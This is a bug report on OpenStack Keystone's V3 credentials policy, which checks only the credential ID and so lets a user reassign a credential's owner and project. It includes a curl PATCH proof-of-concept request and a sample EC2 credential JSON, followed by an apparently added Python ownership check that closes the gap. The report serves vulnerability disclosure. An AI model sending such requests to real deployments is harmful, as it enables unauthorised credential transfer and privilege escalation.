Comment 0 for bug 1872733

kay (kay-diam) wrote : Keystone V3 /credentials endpoint policy logic allows to change credentials owner or target project ID

"_build_target_enforcement" function checks only for "credential_id": https://github.com/openstack/keystone/blob/7bb6314e40d6947294260324e84a58de191f8609/keystone/api/credentials.py#L38

Thus even having an '"identity:update_credential": "rule:cloud_admin or (user_id:%(target.credential.user_id)s)"' policy doesn't prevent a malicious user from creating an EC2 credential and then changing its owner and project ID, e.g.:

curl -X PATCH https://keystone/v3/credentials/3c2b3265350c6da3a18a143fbe975ca4a8ed88a6f8c6dacc2494a5c1287ba66f -H 'Accept: application/json' -H 'Content-Type: application/json' -H "X-Auth-Token: ***" -d'{
  "credential": {
    "project_id": "_target_project_id_",
    "user_id": "_target_user_id_"
  }
}'

Additionally, it is possible to create a credential with any existing project_id, though this isn't a serious security issue, e.g.:

{
  "credential": {
    "blob": "{\"access\": \"ffe6fc21b47c4d87befc95ad070c3b7a\", \"secret\": \"530196cd097e4a7ca9df7258aa89ff0e\", \"trust_id\": null}",
    "id": "3c2b3265350c6da3a18a143fbe975ca4a8ed88a6f8c6dacc2494a5c1287ba66f",
    "project_id": "_any_project_id_",
    "type": "ec2",
    "user_id": "_my_user_id_"
  }
}
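The gap the report describes is that the policy target is built from the credential id alone, so the user_id and project_id carried in the PATCH body are never compared against the caller. The following is an added illustration, not Keystone's code and not its actual fix: a hypothetical enforcer (Caller, Forbidden, build_target, enforce_update_credential, is_update_allowed are all invented names) that includes the requested changes in the target and rejects a non-admin moving a credential to another user or to a project the caller is not a member of.

```python
"""Hypothetical ownership check for credential updates (added example, not Keystone code)."""
from dataclasses import dataclass, field


class Forbidden(Exception):
    """Policy check failed (stands in for a 403 from the API)."""


@dataclass
class Caller:
    user_id: str
    project_ids: frozenset = field(default_factory=frozenset)  # projects the caller has a role on
    is_cloud_admin: bool = False


def build_target(credential_store, credential_id, patch_body):
    """Policy target = the stored credential PLUS the changes the caller asked for."""
    stored = credential_store[credential_id]  # KeyError would be a 404 in a real API
    return {"credential": stored, "update": patch_body.get("credential", {})}


def enforce_update_credential(caller, target):
    """rule:cloud_admin or owner; a non-admin may not transfer the credential."""
    if caller.is_cloud_admin:
        return True
    stored, update = target["credential"], target["update"]
    if stored["user_id"] != caller.user_id:
        raise Forbidden("caller does not own this credential")
    # The check missing in the report: the new owner must still be the caller...
    if update.get("user_id", caller.user_id) != caller.user_id:
        raise Forbidden("cannot transfer credential to another user")
    # ...and the new project must be one the caller actually belongs to.
    new_project = update.get("project_id", stored.get("project_id"))
    if new_project is not None and new_project not in caller.project_ids:
        raise Forbidden("cannot bind credential to a project the caller is not in")
    return True


def is_update_allowed(caller, credential_store, credential_id, patch_body):
    """Convenience wrapper: True if the PATCH passes policy, False if it is forbidden."""
    try:
        return enforce_update_credential(caller, build_target(credential_store, credential_id, patch_body))
    except Forbidden:
        return False


if __name__ == "__main__":
    # Constructed sample data: alice owns credential c1 in her own project.
    store = {"c1": {"id": "c1", "user_id": "alice", "project_id": "p-alice", "type": "ec2"}}
    alice = Caller("alice", frozenset({"p-alice"}))
    print(is_update_allowed(alice, store, "c1", {"credential": {"user_id": "bob", "project_id": "p-bob"}}))
```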